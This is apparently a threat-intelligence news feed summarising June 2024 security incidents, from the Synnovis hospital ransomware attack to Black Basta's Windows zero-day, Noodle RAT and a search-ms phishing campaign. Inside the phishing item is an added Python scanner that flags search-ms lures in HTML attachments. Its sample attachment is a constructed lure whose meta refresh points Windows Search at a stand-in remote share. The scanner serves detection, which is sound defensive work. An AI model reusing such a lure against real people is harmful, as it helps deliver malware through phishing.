    NHS England disclosed that multiple London hospitals affected by the Synnovis ransomware attack were compelled to cancel hundreds of planned operations and appointments. Synnovis, formerly known as Viapath, was established as a partnership among SYNLAB UK & Ireland, Guy's and St Thomas' NHS Foundation Trust, and King's College Hospital NHS Foundation Trust. The June 3 attack by the Qilin ransomware group led to significant service disruptions at these trusts and primary care providers in South East London, affecting procedures reliant on pathology services, such as blood transfusions and testing. While emergency services remained operational, the NHS reported over 800 planned operations and 700 outpatient appointments needed to be rescheduled. The recovery process is expected to take months. Additionally, NHS Blood and Transplant warned about a blood shortage in London hospitals, specifically requesting O-positive and O-negative blood donors to replenish reserves critical for urgent procedures. The attack's impact on operations and patient care prompted hospital executives to apologize and urge patients to attend their appointments unless notified otherwise.

  • Jun 13, 2024

    • Blackbasta
    • CVE-2024-26169
    • Darkgate

    Black Basta ransomware gang linked to Windows zero-day attacks

    The Black Basta ransomware operation is suspected of exploiting a Windows privilege escalation vulnerability (CVE-2024-26169) as a zero-day before a fix was made available. This high-severity flaw (CVSS v3.1: 7.8) in the Windows Error Reporting Service allows attackers to elevate their privileges to SYSTEM. Microsoft addressed the issue in its March 12, 2024 Patch Tuesday updates, although the vendor's page shows no evidence of active exploitation. However, Symantec's report indicates that the Cardinal cybercrime group (Storm-1811, UNC4394), operators of the Black Basta gang, likely leveraged this vulnerability as a zero-day. Symantec's investigation revealed that an exploit tool for CVE-2024-26169 was used in an attempted ransomware attack following an initial infection by the DarkGate loader, which Black Basta has utilized since the QakBot takedown. The attackers, linked to Black Basta, used batch scripts disguised as software updates to run malicious commands and maintain persistence. The exploit tool takes advantage of the Windows file werkernel.sys using a null security descriptor when creating registry keys, allowing the creation of a registry key that launches a shell with SYSTEM privileges. Notably, one variant of the exploit tool has a compilation timestamp from February 27, 2024, and another from December 18, 2023, suggesting Black Basta had a working exploit well before Microsoft fixed the flaw. Despite the possibility of modified timestamps, the attackers likely did not falsify these dates. Black Basta, linked to the defunct Conti syndicate, has a record of expertise in exploiting Windows tools.

  • Jun 13, 2024

    • Calypso
    • Mustang Panda
    • Angryrebel
    • Rocke
    • Exfiltration Over C2 Channel
    • Local Account
    • Compromise Accounts

    New Malware 'Noodle RAT' Targets Windows and Linux Systems

    A newly identified cross-platform malware, named Noodle RAT, has been actively used by Chinese-speaking threat actors for espionage or cybercrime over the years. Originally categorized as a variant of Gh0st RAT and Rekoobe, Trend Micro security researcher Hara Hiroaki clarifies that Noodle RAT is a distinct new type of malware. Known by other names such as ANGRYREBEL and Nood RAT, it has versions for both Windows and Linux and has been in use since at least July 2016. The Windows variant of Noodle RAT, used by hacking groups like Iron Tiger and Calypso, functions as an in-memory modular backdoor capable of downloading/uploading files, executing additional malware, serving as a TCP proxy, and self-deleting. The Linux version has been employed by cybercrime and espionage clusters such as Rocke and Cloud Snooper, launching reverse shells, scheduling executions, and utilizing SOCKS tunneling through compromised Linux servers. Despite the differences in the backdoor commands for Windows and Linux, both versions of Noodle RAT share identical code for command-and-control (C2) communications and similar configuration formats. The malware, developed and maintained with frequent updates, appears to be commercially sold within a complex supply chain that serves both private sector firms and Chinese state-sponsored entities. Trend Micro’s analysis revealed access to a control panel and builder for the Linux variant, written in Simplified Chinese, suggesting organized distribution and use among Chinese-speaking groups. This finding aligns with earlier leaks highlighting China's extensive corporate hack-for-hire scene and its ties to state-sponsored cyber actors. The ongoing use of Noodle RAT, coupled with its misclassification and underrated threat level, underscores the persistent and evolving nature of Chinese cyber espionage efforts.

  • Jun 13, 2024

    • Phishing
    • Uri Hijacking

    Windows search protocol Phishing Campaign

    A new phishing campaign is leveraging HTML attachments to exploit the Windows search protocol (search-ms URI) to deliver malware. This technique allows attackers to force Windows Search to query file shares on remote hosts, thus opening a custom search window. Initially highlighted by Prof. Dr. Martin Johns in 2020, this functionality can be abused to share malicious files. Security researchers, including Trustwave SpiderLabs, have observed this method being used in the wild, with threat actors sending emails containing HTML attachments disguised as invoice documents. When opened, these attachments automatically open a malicious URL using a <meta> refresh tag, or a clickable link if the refresh fails, leading to a search on a remote host for a file labeled "INVOICE." The recent attacks begin with a malicious email carrying an HTML attachment within a small ZIP archive, which helps evade security scanners. The HTML file directs the browser to a URL for the Windows Search protocol, performing a search on a remote server masked by Cloudflare. The search results display a shortcut (LNK) file named as an invoice, which triggers a batch script (BAT) when clicked. While Trustwave could not determine the exact function of the BAT because the server was down, the potential for harmful operations is significant. To defend against this threat, Trustwave recommends deleting registry entries associated with the search-ms/search URI protocol, though this action should be taken with caution as it may impact legitimate applications relying on this protocol.
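    A mail-gateway style check for the lure described above, added here as an example (it is not code from Cyberint or Trustwave): it parses an HTML attachment, flags meta refresh targets and links that use the search-ms or search URI schemes, and pulls out the remote location the search would query. The sample attachment and the host remote.invalid are constructed for the example.

```python
"""Scan an HTML attachment for search-ms / search URIs (added example, not Cyberint's code)."""
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Both URI schemes named in the mitigation above (search-ms and search).
SEARCH_SCHEMES = ("search-ms:", "search:")
# A meta refresh's content attribute looks like "0; url=<target>" (quotes optional).
_REFRESH_URL_RE = re.compile(r"url\s*=\s*['\"]?([^'\"]+)", re.IGNORECASE)
# The crumb parameter carries the location Windows Search is told to query.
_LOCATION_RE = re.compile(r"crumb=location:([^&]+)", re.IGNORECASE)


def _is_search_uri(value):
    """True if the (percent-decoded) value uses one of the search URI schemes."""
    return unquote(value).strip().lower().startswith(SEARCH_SCHEMES)


class _SearchUriScanner(HTMLParser):
    """Collects (element, uri) pairs for every search URI found in the document."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}  # names are lowercased
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = _REFRESH_URL_RE.search(a.get("content", ""))
            if m and _is_search_uri(m.group(1)):
                self.findings.append(("meta-refresh", unquote(m.group(1)).strip()))
        elif tag in ("a", "iframe", "frame"):
            target = a.get("href") if tag == "a" else a.get("src")
            if target and _is_search_uri(target):
                self.findings.append((tag, unquote(target).strip()))


def scan_html(html):
    """Return the list of (element, uri) findings for one HTML document."""
    scanner = _SearchUriScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def extract_location(uri):
    """Return the remote location a search URI points Windows Search at, or None."""
    m = _LOCATION_RE.search(uri)
    return m.group(1) if m else None


# Constructed sample resembling the lure: meta refresh first, clickable fallback second.
SAMPLE_ATTACHMENT = r"""<html><head>
<meta http-equiv="refresh" content="0; url=search-ms:query=INVOICE&amp;crumb=location:\\remote.invalid@80\share&amp;displayname=Downloads">
</head><body>
<a href="search-ms:query=INVOICE&amp;crumb=location:\\remote.invalid@80\share">Open invoice</a>
<a href="https://example.invalid/statement">Unrelated, harmless link</a>
</body></html>"""

if __name__ == "__main__":
    for element, uri in scan_html(SAMPLE_ATTACHMENT):
        print(f"{element}: {uri} -> remote location {extract_location(uri)}")
```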

  • Jun 13, 2024

    • ransomware
    • arrest

    LockBit & Conti Ransomware Affiliate Arrested in Ukraine

    A 28-year-old Ukrainian man has been arrested for his work as a freelance developer for the Russian ransomware groups Conti and LockBit. He specialized in creating cryptors, software that hides malware from antivirus detection, and frequently worked for these groups in exchange for cryptocurrency. His cryptors were identified in successful ransomware attacks in Belgium and the Netherlands, potentially leading to a prison sentence of up to 15 years. The arrest is part of Operation Endgame, an international law enforcement effort against cybercrime, and was facilitated by Dutch officials and the National Cyber Security Center.

  • Jun 10, 2024

    • global
    • campaign
    • google

    Google Takes Down Influence Campaigns Tied to China, Indonesia, and Russia

    Google has taken significant action against coordinated influence operations, removing 1,320 YouTube channels and 1,177 Blogger blogs linked to the People's Republic of China (PRC). These channels were spreading content in Chinese and English about China and U.S. foreign affairs. Additionally, Google terminated various accounts connected to influence campaigns from Indonesia, which supported the ruling party, and dismantled a network of 378 YouTube channels managed by a Russian consulting firm that promoted pro-Russian and anti-Ukrainian narratives. Other notable takedowns included channels from Pakistan, France, Russia, and Myanmar that were involved in spreading political propaganda. These efforts are part of a broader initiative by tech companies to combat disinformation. For instance, Meta and OpenAI recently disrupted an influence campaign by the Tel Aviv-based Stoic firm, which propagated pro-Israel messages amid the Israel-Hamas conflict. Microsoft also reported on Russia's escalating disinformation campaigns targeting the 2024 Summer Olympics in France, using AI-generated content to undermine the International Olympic Committee (IOC) and promote pro-Kremlin narratives. These actions highlight the ongoing battle against disinformation and the importance of robust measures to protect the integrity of information platforms.

  • Jun 10, 2024

    • vulnerability
    • exploit
    • microsoft

    Microsoft Warns of Potential Abuse by Threat Actors

    Microsoft has warned about threat actors' potential misuse of Azure Service Tags to bypass firewall rules and gain unauthorized access to cloud resources. The concern arises from findings by cybersecurity firm Tenable, which revealed that relying solely on Azure Service Tags for firewall rules could allow an attacker from one tenant to send crafted web requests to access resources in another tenant. This vulnerability affects at least ten Azure services, including Azure DevOps and Azure Machine Learning. Microsoft emphasizes that Service Tags should not be treated as a security boundary but as a routing mechanism used in conjunction with other validation controls. They recommend that customers review their use of Service Tags and ensure additional security measures are in place to authenticate trusted network traffic. Following the disclosure, Microsoft updated its documentation to highlight that Service Tags alone are insufficient for securing traffic without considering the nature of the service and the traffic it handles.

  • Jun 10, 2024

    • microsoft
    • malware

    Malicious VSCode extensions with millions of installs discovered

    Israeli researchers have uncovered significant security flaws in the Visual Studio Code (VSCode) Marketplace, highlighting vulnerabilities through an experiment that "infected" over 100 organizations by trojanizing a popular theme. They created a fake extension mimicking the popular 'Dracula Official' theme, which included risky code designed to collect system information and send it to a remote server. This experiment revealed that even high-value targets, such as a company with a $483 billion market cap, major security firms, and a national justice court network, were susceptible to such attacks. The researchers emphasized the need for better security measures in the VSCode Marketplace. The study further identified thousands of extensions with potential security risks, including 1,283 with known malicious code, 8,161 communicating with hardcoded IP addresses, and 1,452 running unknown executables. Despite reporting these findings to Microsoft, many of these risky extensions remain available for download. The researchers plan to release a tool named 'ExtensionTotal' to help developers scan their environments for threats, underscoring the need for the security community to focus on this exposed and high-risk attack vector.

  • Jun 10, 2024

    • Technology
    • Maldoc In Pdf
    • Europe
    • Russia
    • Belarus
    • Phishing For Information
    • Eastern Europe
    • Email Accounts
    • Phishing
    • Manufacturing

    Sticky Werewolf Expands Cyber Attack Targets in Russia and Belarus

    Cybersecurity researchers have disclosed details about a threat actor known as Sticky Werewolf, linked to cyber attacks targeting entities in Russia and Belarus. These phishing attacks have expanded beyond their initial focus on government organizations to include a pharmaceutical company, a Russian microbiology research institute, and the aviation sector, according to a report by Morphisec. Previous campaigns by Sticky Werewolf involved phishing emails containing links to download malicious files from platforms like gofile.io. The latest campaign uses archive files with LNK files pointing to a payload on WebDAV servers. These attacks aim to deliver commodity RATs and information-stealing malware such as Rhadamanthys and Ozone RAT. Although there's no definitive evidence of the group's national origin, the geopolitical context suggests possible links to a pro-Ukrainian cyberespionage group or hacktivists. This development follows BI.ZONE's revelation of another threat cluster, Sapphire Werewolf, responsible for over 300 attacks on Russian sectors using Amethyst malware.

  • Jun 09, 2024

    • Venezuela
    • Latin America And The Caribbean
    • exclusive
    • Glorysec

    GlorySec Launches Malware Attack in Venezuela

    In a concerning development, the hacker group GlorySec has revealed a cyber operation targeting companies in Ciudad Guayana, Venezuela. They claim to have deployed worm-type malware via USB sticks, infiltrating the systems of over 100 companies. This represents a significant escalation in GlorySec’s activities as they expand their influence and capabilities. According to GlorySec, their malware has spread widely, enabling a complete system takeover and access to personal PCs. The group posted proof of their actions on their storage channel, including screenshots from a compromised PC named “KingBike.” GlorySec stated their intention was to test the limits of their new malware without causing major harm, while showcasing its reach and capabilities. They also declared a political motive, aiming to destabilize the regime of Venezuelan President Nicolás Maduro. GlorySec hinted at a possible future deployment of their worm in Russia, contingent on the escalation of the Russo-Ukrainian war and the direct involvement of the United States. This potential operation highlights the group's strategic focus on geopolitical conflicts and their readiness to exploit such situations to test and demonstrate their cyber warfare tools.
